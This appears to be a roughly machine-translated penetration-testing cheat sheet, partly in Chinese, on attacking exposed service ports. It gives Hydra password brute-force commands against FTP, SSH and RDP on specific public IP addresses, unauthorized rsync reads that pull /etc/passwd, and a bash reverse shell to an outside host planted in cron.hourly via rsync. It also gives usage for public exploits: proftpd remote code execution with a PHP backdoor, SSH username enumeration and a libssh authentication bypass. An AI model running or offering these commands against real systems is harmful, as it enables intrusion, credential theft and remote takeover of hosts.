0x00 Introduction
In the link of information collection in the penetration test, port probes are a key point of attention. Different ports will represent services transmitted by different protocols. For these common service ports, we need to carry out Do a brief summary of the penetration testing
Service ports I have seen:
0x01 password blasting-ftp-rdp-ssh
Three remote protocols and asking price transmission protocols, probes to the corresponding port can try weak password blasting, here introduces the frequently used Hydra blasting-hydra
project address: https://github.com/vanhauser-thc/thc- Hydra
supports weak password blasting of multiple protocols, integrated in Kali
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
爆破实例:
hydra -L test -P 10top1K.txt 47.110.53.159 ftp -V
hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V
hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V
0x02 Unauthorized access due to improper configuration - Rsync
rsync is a commonly used Linux application for file synchronization. It can synchronize files between a local computer and a remote computer, or between two local directories (but does not support synchronization between two remote computers). It can also be used as a file copy tool, replacing the cp and mv commands.
By default, it listens to port 873. When the other party opens the ACL or access password, it can read and write files on the target without authorization
Judgment: rsync rsync://123.58.236.76:45854/
利用:
-读取文件:rsync rsync://123.58.236.76:45854/src/
-下载文件:rsync rsync://123.58.236.76:45854/src/etc/passwd ./
-上传文件:rsync -av passwd rsync://123.58.236.76:45854/src/tmp/passwd
反弹shell:
1、获取信息:
rsync rsync://123.58.236.76:12177/src/etc/crontab /root/cron.txt
2.创建文件
touch shell
#!/bin/bash
/bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1
chmod +x shell
3、上传文件
rsync -av shell rsync://123.58.236.76:12177/src/etc/cron.hourly
4、等待接受反弹
msf linkage fofa batch verification unauthorized Rsync protocol
fofa collection project: https://github.com/wgpsec/fofa_viewer
msf batch verification:
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run
0x03 RCE command execution, FTP-proftpd
Usage exp: https://github.com/t0kx/exploit-CVE-2015-3306
Use rce:
python exploit.py --host xxx.xxx.xxx.xxx --port xxx --path
"/var/www/html/" http://xxx:xxx/backdoor.php?cmd=id
Exp source code:
0x04 ssh username enumeration -cve 2018 15473
exp: https://github.com/Rhynorater/CVE-2018-15473-Exploit
combined with username enumeration and password blasting can greatly improve blasting efficiency
. Use:
pip3 install -r requirements.txt pip3 install paramiko==2.4.1 python
sshUsernameEnumExploit.py --port 32013 --userList exampleInput.txt
123.58.236.76
0x05 ssh authentication bypass
exp: https://www.seebug.org/vuldb/ssvid-97614
exploit: python libssh.py IP port "id"
Screenshots are not used for exp, masters can test by themselves. All the above exp tests are available